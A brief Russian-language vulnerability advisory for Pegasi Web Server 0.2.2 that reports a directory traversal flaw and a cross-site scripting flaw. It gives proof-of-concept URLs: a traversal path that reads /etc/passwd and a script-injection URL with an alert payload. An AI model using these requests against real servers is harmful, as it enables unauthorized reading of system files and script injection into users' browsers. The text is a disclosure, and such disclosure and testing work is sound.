Программа: Pegasi Web Server 0.2.2
Несколько уязвимостей обнаружено в Pegasi Web Server. Удаленный пользователь может просматривать файлы на целевой системе, расположенные вне Web каталога. Удаленный пользователь может выполнить XSS нападение.
1. Обход каталога:
http://[host]:8080/../../../../etc/passwd
http://[host]:8080/../
2. XSS
http://[host]:8080/<script>alert("Test")</script>
